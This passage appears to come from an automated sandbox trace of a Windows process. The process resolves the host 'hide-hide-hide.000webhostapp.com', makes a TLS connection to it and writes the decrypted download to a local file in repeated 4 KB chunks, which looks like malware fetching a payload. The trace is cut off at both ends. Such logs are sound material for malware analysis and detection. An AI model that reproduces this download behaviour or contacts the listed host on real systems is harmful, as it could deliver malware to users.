lpdwindex=0x5be80c | out: lpdwindex=0x5be80c) returned 0x80010115 [0066.844] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea40*=0x4b4, lpdwindex=0x5be85c | out: lpdwindex=0x5be85c) returned 0x80010115 [0066.844] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea40*=0x4bc, lpdwindex=0x5be85c | out: lpdwindex=0x5be85c) returned 0x80010115 [0066.844] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea40*=0x4c4, lpdwindex=0x5be85c | out: lpdwindex=0x5be85c) returned 0x80010115 [0066.845] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x51c [0066.845] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5d0 [0066.845] GetAddrInfoW (in: pNodeName="hide-hide-hide.000webhostapp.com", pServiceName=0x0, pHints=0x5be940*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5be8e8 | out: ppResult=0x5be8e8*=0x77e3590*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="us-east-1.route-1.000webhost.awex.io", ai_addr=0x77e5f50*(sa_family=2, sin_port=0x0, sin_addr="145.14.144.244"), ai_next=0x0)) returned 0 [0067.007] FreeAddrInfoW (pAddrInfo=0x77e3590*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="us-east-1.route-1.000webhost.awex.io", ai_addr=0x77e5f50*(sa_family=2, sin_port=0x0, sin_addr="145.14.144.244"), ai_next=0x0)) [0067.007] GetAddrInfoW (in: pNodeName="hide-hide-hide.000webhostapp.com", pServiceName=0x0, pHints=0x5be940*(ai_flags=131072, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x5be8e8 | out: ppResult=0x5be8e8*=0x77e3658*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="hide-hide-hide.000webhostapp.com", ai_addr=0x77e6040*(sa_family=2, sin_port=0x0, sin_addr="145.14.144.244"), ai_next=0x0)) returned 0 [0067.009] FreeAddrInfoW (pAddrInfo=0x77e3658*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="hide-hide-hide.000webhostapp.com", ai_addr=0x77e6040*(sa_family=2, sin_port=0x0, sin_addr="145.14.144.244"), ai_next=0x0)) [0067.009] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5be884*=0x5c0, lpdwindex=0x5be6a4 | out: lpdwindex=0x5be6a4) returned 0x80010115 [0067.010] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5be884*=0x5c8, lpdwindex=0x5be6a4 | out: lpdwindex=0x5be6a4) returned 0x80010115 [0067.010] WSAConnect (in: s=0x51c, name=0x2670fa4*(sa_family=2, sin_port=0x1bb, sin_addr="145.14.144.244"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0 [0067.275] closesocket (s=0x5d0) returned 0 [0067.276] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x77e8200 [0067.276] CryptFindOIDInfo (dwKeyType=0x2, pvKey=0x77e8200, dwGroupId=0x0) returned 0x0 [0067.276] LocalFree (hMem=0x77e8200) returned 0x0 [0067.276] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x77e7f00 [0067.276] CryptFindOIDInfo (dwKeyType=0x2, pvKey=0x77e7f00, dwGroupId=0x0) returned 0x0 [0067.276] LocalFree (hMem=0x77e7f00) returned 0x0 [0067.276] InitializeSecurityContextW (in: phCredential=0x5be660, phContext=0x0, pTargetName=0x2671018, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x267177c, pOutput=0x2671714, pfContextAttr=0x267155c, ptsExpiry=0x5be658 | out: phNewContext=0x267177c, pOutput=0x2671714, pfContextAttr=0x267155c, ptsExpiry=0x5be658) returned 0x90312 [0067.277] FreeContextBuffer (in: pvContextBuffer=0xa87888 | out: pvContextBuffer=0xa87888) returned 0x0 [0067.277] send (s=0x51c, buf=0x2671790*, len=140, flags=0) returned 140 [0067.277] recv (in: s=0x51c, buf=0x2671790, len=5, flags=0 | out: buf=0x2671790*) returned 5 [0067.909] recv (in: s=0x51c, buf=0x2671795, len=65, flags=0 | out: buf=0x2671795*) returned 65 [0067.909] InitializeSecurityContextW (in: phCredential=0x5be5b8, phContext=0x5be648, pTargetName=0x2671018, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x26718a0, Reserved2=0x0, phNewContext=0x267177c, pOutput=0x26718b4, pfContextAttr=0x267155c, ptsExpiry=0x5be5b0 | out: phNewContext=0x267177c, pOutput=0x26718b4, pfContextAttr=0x267155c, ptsExpiry=0x5be5b0) returned 0x90312 [0067.910] recv (in: s=0x51c, buf=0x2671944, len=5, flags=0 | out: buf=0x2671944*) returned 5 [0067.910] recv (in: s=0x51c, buf=0x267195d, len=2705, flags=0 | out: buf=0x267195d*) returned 2705 [0067.910] InitializeSecurityContextW (in: phCredential=0x5be514, phContext=0x5be5a4, pTargetName=0x2671018, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2672460, Reserved2=0x0, phNewContext=0x267177c, pOutput=0x2672474, pfContextAttr=0x267155c, ptsExpiry=0x5be50c | out: phNewContext=0x267177c, pOutput=0x2672474, pfContextAttr=0x267155c, ptsExpiry=0x5be50c) returned 0x90312 [0067.911] recv (in: s=0x51c, buf=0x2672504, len=5, flags=0 | out: buf=0x2672504*) returned 5 [0067.911] recv (in: s=0x51c, buf=0x267251d, len=298, flags=0 | out: buf=0x267251d*) returned 298 [0067.911] InitializeSecurityContextW (in: phCredential=0x5be470, phContext=0x5be500, pTargetName=0x2671018, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x26726b8, Reserved2=0x0, phNewContext=0x267177c, pOutput=0x26726cc, pfContextAttr=0x267155c, ptsExpiry=0x5be468 | out: phNewContext=0x267177c, pOutput=0x26726cc, pfContextAttr=0x267155c, ptsExpiry=0x5be468) returned 0x90312 [0067.912] recv (in: s=0x51c, buf=0x267275c, len=5, flags=0 | out: buf=0x267275c*) returned 5 [0067.912] recv (in: s=0x51c, buf=0x2672775, len=4, flags=0 | out: buf=0x2672775*) returned 4 [0067.912] InitializeSecurityContextW (in: phCredential=0x5be3cc, phContext=0x5be45c, pTargetName=0x2671018, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x26727ec, Reserved2=0x0, phNewContext=0x267177c, pOutput=0x2672800, pfContextAttr=0x267155c, ptsExpiry=0x5be3c4 | out: phNewContext=0x267177c, pOutput=0x2672800, pfContextAttr=0x267155c, ptsExpiry=0x5be3c4) returned 0x90312 [0068.186] FreeContextBuffer (in: pvContextBuffer=0xa936b0 | out: pvContextBuffer=0xa936b0) returned 0x0 [0068.186] send (s=0x51c, buf=0x267287c*, len=101, flags=0) returned 101 [0068.187] recv (in: s=0x51c, buf=0x267287c, len=5, flags=0 | out: buf=0x267287c*) returned 5 [0068.313] recv (in: s=0x51c, buf=0x2672909, len=186, flags=0 | out: buf=0x2672909*) returned 186 [0068.313] InitializeSecurityContextW (in: phCredential=0x5be328, phContext=0x5be3b8, pTargetName=0x2671018, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2672a34, Reserved2=0x0, phNewContext=0x267177c, pOutput=0x2672a48, pfContextAttr=0x267155c, ptsExpiry=0x5be320 | out: phNewContext=0x267177c, pOutput=0x2672a48, pfContextAttr=0x267155c, ptsExpiry=0x5be320) returned 0x90312 [0068.314] recv (in: s=0x51c, buf=0x2672ad8, len=5, flags=0 | out: buf=0x2672ad8*) returned 5 [0068.314] recv (in: s=0x51c, buf=0x2672af1, len=1, flags=0 | out: buf=0x2672af1*) returned 1 [0068.314] InitializeSecurityContextW (in: phCredential=0x5be284, phContext=0x5be314, pTargetName=0x2671018, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2672b64, Reserved2=0x0, phNewContext=0x267177c, pOutput=0x2672b78, pfContextAttr=0x267155c, ptsExpiry=0x5be27c | out: phNewContext=0x267177c, pOutput=0x2672b78, pfContextAttr=0x267155c, ptsExpiry=0x5be27c) returned 0x90312 [0068.314] recv (in: s=0x51c, buf=0x2672c08, len=5, flags=0 | out: buf=0x2672c08*) returned 5 [0068.314] recv (in: s=0x51c, buf=0x2672c21, len=48, flags=0 | out: buf=0x2672c21*) returned 48 [0068.314] InitializeSecurityContextW (in: phCredential=0x5be1e0, phContext=0x5be270, pTargetName=0x2671018, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2672cc4, Reserved2=0x0, phNewContext=0x267177c, pOutput=0x2672cd8, pfContextAttr=0x267155c, ptsExpiry=0x5be1d8 | out: phNewContext=0x267177c, pOutput=0x2672cd8, pfContextAttr=0x267155c, ptsExpiry=0x5be1d8) returned 0x0 [0068.317] QueryContextAttributesW (in: phContext=0x267177c, ulAttribute=0x4, pBuffer=0x2672d68 | out: pBuffer=0x2672d68) returned 0x0 [0068.317] QueryContextAttributesW (in: phContext=0x267177c, ulAttribute=0x5a, pBuffer=0x2672da4 | out: pBuffer=0x2672da4) returned 0x0 [0068.317] QueryContextAttributesW (in: phContext=0x267177c, ulAttribute=0x53, pBuffer=0x2672df0 | out: pBuffer=0x2672df0) returned 0x0 [0068.317] CertDuplicateCertificateContext (pCertContext=0x77e1238) returned 0x77e1238 [0068.317] CertDuplicateStore (hCertStore=0x77e85b8) returned 0x77e85b8 [0068.317] CertEnumCertificatesInStore (hCertStore=0x77e85b8, pPrevCertContext=0x0) returned 0x77e0dd8 [0068.317] CertDuplicateCertificateContext (pCertContext=0x77e0dd8) returned 0x77e0dd8 [0068.317] CertEnumCertificatesInStore (hCertStore=0x77e85b8, pPrevCertContext=0x77e0dd8) returned 0x77e1238 [0068.317] CertDuplicateCertificateContext (pCertContext=0x77e1238) returned 0x77e1238 [0068.317] CertEnumCertificatesInStore (hCertStore=0x77e85b8, pPrevCertContext=0x77e1238) returned 0x0 [0068.318] CertCloseStore (hCertStore=0x77e85b8, dwFlags=0x0) returned 1 [0068.318] CertFreeCertificateContext (pCertContext=0x77e1238) returned 1 [0068.318] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x77e92d8 [0068.318] CertAddCRLLinkToStore (in: hCertStore=0x77e92d8, pCrlContext=0x77e0dd8, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0068.318] CertAddCRLLinkToStore (in: hCertStore=0x77e92d8, pCrlContext=0x77e1238, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0068.318] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x77ec730 [0068.318] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x77e1238, pTime=0x5be1f0, hAdditionalStore=0x77e92d8, pChainPara=0x5be130, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x5be124 | out: ppChainContext=0x5be124) returned 1 [0068.321] LocalFree (hMem=0x77ec730) returned 0x0 [0068.321] CertDuplicateCertificateChain (pChainContext=0x77b5c98) returned 0x77b5c98 [0068.321] CertDuplicateCertificateContext (pCertContext=0x77e1238) returned 0x77e1238 [0068.321] CertDuplicateCertificateContext (pCertContext=0x77e0bf8) returned 0x77e0bf8 [0068.321] CertDuplicateCertificateContext (pCertContext=0x77e0e78) returned 0x77e0e78 [0068.321] CertFreeCertificateChain (pChainContext=0x77b5c98) [0068.321] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x77b5c98, pPolicyPara=0x5be2d0, pPolicyStatus=0x5be2bc | out: pPolicyStatus=0x5be2bc) returned 1 [0068.321] SetLastError (dwErrCode=0x0) [0068.321] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x77b5c98, pPolicyPara=0x5be330, pPolicyStatus=0x5be2e4 | out: pPolicyStatus=0x5be2e4) returned 1 [0068.321] CertFreeCertificateChain (pChainContext=0x77b5c98) [0068.321] CertFreeCertificateContext (pCertContext=0x77e1238) returned 1 [0068.322] EncryptMessage (in: phContext=0x267177c, fQOP=0x0, pMessage=0x26887f0, MessageSeqNo=0x0 | out: pMessage=0x26887f0) returned 0x0 [0068.322] send (s=0x51c, buf=0x2645058*, len=170, flags=0) returned 170 [0068.322] setsockopt (s=0x51c, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0068.323] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.451] recv (in: s=0x51c, buf=0x264fc81, len=4240, flags=0 | out: buf=0x264fc81*) returned 4240 [0068.451] DecryptMessage (in: phContext=0x267177c, pMessage=0x26c8d10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26c8d10, pfQOP=0x0) returned 0x0 [0068.452] setsockopt (s=0x51c, level=65535, optname=4102, optval="\xe0\x93\x04", optlen=4) returned 0 [0068.453] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.453] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0068.453] DecryptMessage (in: phContext=0x267177c, pMessage=0x26da6ac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26da6ac, pfQOP=0x0) returned 0x0 [0068.453] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.454] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.454] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1455 [0068.454] recv (in: s=0x51c, buf=0x2650230, len=2673, flags=0 | out: buf=0x2650230*) returned 2673 [0068.574] DecryptMessage (in: phContext=0x267177c, pMessage=0x26da7c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26da7c0, pfQOP=0x0) returned 0x0 [0068.574] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.575] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.575] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0068.575] DecryptMessage (in: phContext=0x267177c, pMessage=0x26da8d4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26da8d4, pfQOP=0x0) returned 0x0 [0068.575] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.575] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.575] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0068.575] DecryptMessage (in: phContext=0x267177c, pMessage=0x26da9e8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26da9e8, pfQOP=0x0) returned 0x0 [0068.575] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.575] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.575] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 736 [0068.575] recv (in: s=0x51c, buf=0x264ff61, len=3392, flags=0 | out: buf=0x264ff61*) returned 3392 [0068.699] DecryptMessage (in: phContext=0x267177c, pMessage=0x26daafc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26daafc, pfQOP=0x0) returned 0x0 [0068.700] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.700] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.700] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0068.700] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dac10, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dac10, pfQOP=0x0) returned 0x0 [0068.700] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.701] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.701] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0068.701] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dad24, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dad24, pfQOP=0x0) returned 0x0 [0068.701] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.701] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.701] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 17 [0068.701] recv (in: s=0x51c, buf=0x264fc92, len=4111, flags=0 | out: buf=0x264fc92*) returned 4111 [0068.915] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dae38, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dae38, pfQOP=0x0) returned 0x0 [0068.915] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.915] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.915] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0068.915] DecryptMessage (in: phContext=0x267177c, pMessage=0x26daf4c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26daf4c, pfQOP=0x0) returned 0x0 [0068.916] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0068.916] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0068.916] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3431 [0068.916] recv (in: s=0x51c, buf=0x26509e8, len=697, flags=0 | out: buf=0x26509e8*) returned 697 [0069.046] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db060, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db060, pfQOP=0x0) returned 0x0 [0069.047] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.047] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.047] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.047] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db174, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db174, pfQOP=0x0) returned 0x0 [0069.047] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.047] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.048] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.048] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db288, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db288, pfQOP=0x0) returned 0x0 [0069.048] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.048] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.048] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.048] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db39c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db39c, pfQOP=0x0) returned 0x0 [0069.048] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.048] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.049] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1499 [0069.049] recv (in: s=0x51c, buf=0x265025c, len=2629, flags=0 | out: buf=0x265025c*) returned 2629 [0069.166] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db4b0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db4b0, pfQOP=0x0) returned 0x0 [0069.166] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.167] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.167] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.167] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db5c4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db5c4, pfQOP=0x0) returned 0x0 [0069.167] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.167] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.167] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 533 [0069.167] recv (in: s=0x51c, buf=0x264fe96, len=3595, flags=0 | out: buf=0x264fe96*) returned 3595 [0069.172] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db6d8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db6d8, pfQOP=0x0) returned 0x0 [0069.172] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.172] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.172] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 3700 [0069.172] recv (in: s=0x51c, buf=0x2650af5, len=428, flags=0 | out: buf=0x2650af5*) returned 428 [0069.344] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db7ec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db7ec, pfQOP=0x0) returned 0x0 [0069.344] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.345] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.345] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.345] DecryptMessage (in: phContext=0x267177c, pMessage=0x26db900, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26db900, pfQOP=0x0) returned 0x0 [0069.345] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.345] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.345] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.345] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dba14, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dba14, pfQOP=0x0) returned 0x0 [0069.345] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.346] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.346] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 4128 [0069.346] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dbb28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dbb28, pfQOP=0x0) returned 0x0 [0069.346] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, lpNumberOfBytesWritten=0x5bebc4*=0x1000, lpOverlapped=0x0) returned 1 [0069.346] recv (in: s=0x51c, buf=0x264fc7c, len=5, flags=0 | out: buf=0x264fc7c*) returned 5 [0069.346] recv (in: s=0x51c, buf=0x264fc81, len=4128, flags=0 | out: buf=0x264fc81*) returned 1768 [0069.346] recv (in: s=0x51c, buf=0x2650369, len=2360, flags=0 | out: buf=0x2650369*) returned 2360 [0069.436] DecryptMessage (in: phContext=0x267177c, pMessage=0x26dbc3c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x26dbc3c, pfQOP=0x0) returned 0x0 [0069.436] WriteFile (in: hFile=0x518, lpBuffer=0x26d9618*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x5bebc4, lpOverlapped=0x0 | out: lpBuffer=0x26d9618*, 